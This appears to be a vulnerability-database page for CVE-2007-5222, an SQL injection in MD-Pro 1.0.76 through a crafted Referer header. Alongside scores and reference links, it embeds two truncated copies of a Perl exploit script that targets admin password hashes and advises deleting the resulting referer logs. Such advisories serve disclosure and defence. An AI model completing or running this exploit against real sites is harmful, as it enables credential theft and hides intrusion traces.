CVE-2007-5222
published 2007-10-05CVE-2007-5222: SQL injection vulnerability in index.php in MAXdev MDPro (MD-Pro) 1.0.76 allows remote attackers to execute arbitrary SQL commands via a "Firefox ID="…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.65%
73.6th percentile
SQL injection vulnerability in index.php in MAXdev MDPro (MD-Pro) 1.0.76 allows remote attackers to execute arbitrary SQL commands via a "Firefox ID=" substring in a Referer HTTP header.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| maxdev | mdpro | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MD-Pro 1.0.76 - 'index.php' Firefox ID SQL Injection
exploitdb·2007-09-29
CVE-2007-5222 MD-Pro 1.0.76 - 'index.php' Firefox ID SQL Injection
MD-Pro 1.0.76 - 'index.php' Firefox ID SQL Injection
---
source: https://www.securityfocus.com/bid/25864/info
MD-Pro is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
MD-Pro 1.0.76 is vulnerable to this issue; other versions may also be affected.
#!/usr/bin/perl
use strict;
use IO::Socket;
my $app = "MDPro 1.0.76";
my $type = "SQL Injection";
my $author = "undefined1_";
my $settings = "magic_quotes_runtime = off, mysql >= 4.1.0";
$| = 1;
print ":: $app $type - by $author ::\n\n\n";
my $url = shift || usage();
if($url =~ m/^(?:http:\
Exploit-DB
MD-Pro 1.0.76 - SQL Injection
exploitdb·2007-09-29
CVE-2007-5222 MD-Pro 1.0.76 - SQL Injection
MD-Pro 1.0.76 - SQL Injection
---
#!/usr/bin/perl
use strict;
use IO::Socket;
my $app = "MDPro 1.0.76";
my $type = "SQL Injection";
my $author = "undefined1_";
my $settings = "magic_quotes_runtime = off, mysql >= 4.1.0";
$| = 1;
print ":: $app $type - by $author ::\n\n\n";
my $url = shift || usage();
if($url =~ m/^(?:http:\/\/)(.*)/) {
$url = $1;
}
if($url !~ m/^.*\/$/) {
$url .= "/";
}
get_md5s($url);
print "don't forget to delete the referers from the admin interface...\n";
sub get_md5s {
my $url = shift;
$url .= "index.php";
my $admins_only = shift;
my $ps = 0;
my $referer = "Firefox ID=". randstring(20,25);
my $uid_charset = "1234567890";
my $user_charset = "abcdefghijklmnopqrstuvwxyz-_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ][}{+=/\\'\"\@\$#!%^&*()";
my $pass_charset = "afc01234
No writeups or analysis indexed.
http://osvdb.org/38556http://www.maxdev.com/Article641.phtmlhttp://www.securityfocus.com/bid/25864http://www.securityfocus.com/data/vulnerabilities/exploits/25864.plhttp://www.vupen.com/english/advisories/2007/3314https://exchange.xforce.ibmcloud.com/vulnerabilities/36871https://www.exploit-db.com/exploits/4467http://osvdb.org/38556http://www.maxdev.com/Article641.phtmlhttp://www.securityfocus.com/bid/25864http://www.securityfocus.com/data/vulnerabilities/exploits/25864.plhttp://www.vupen.com/english/advisories/2007/3314https://exchange.xforce.ibmcloud.com/vulnerabilities/36871https://www.exploit-db.com/exploits/4467
2007-10-05
Published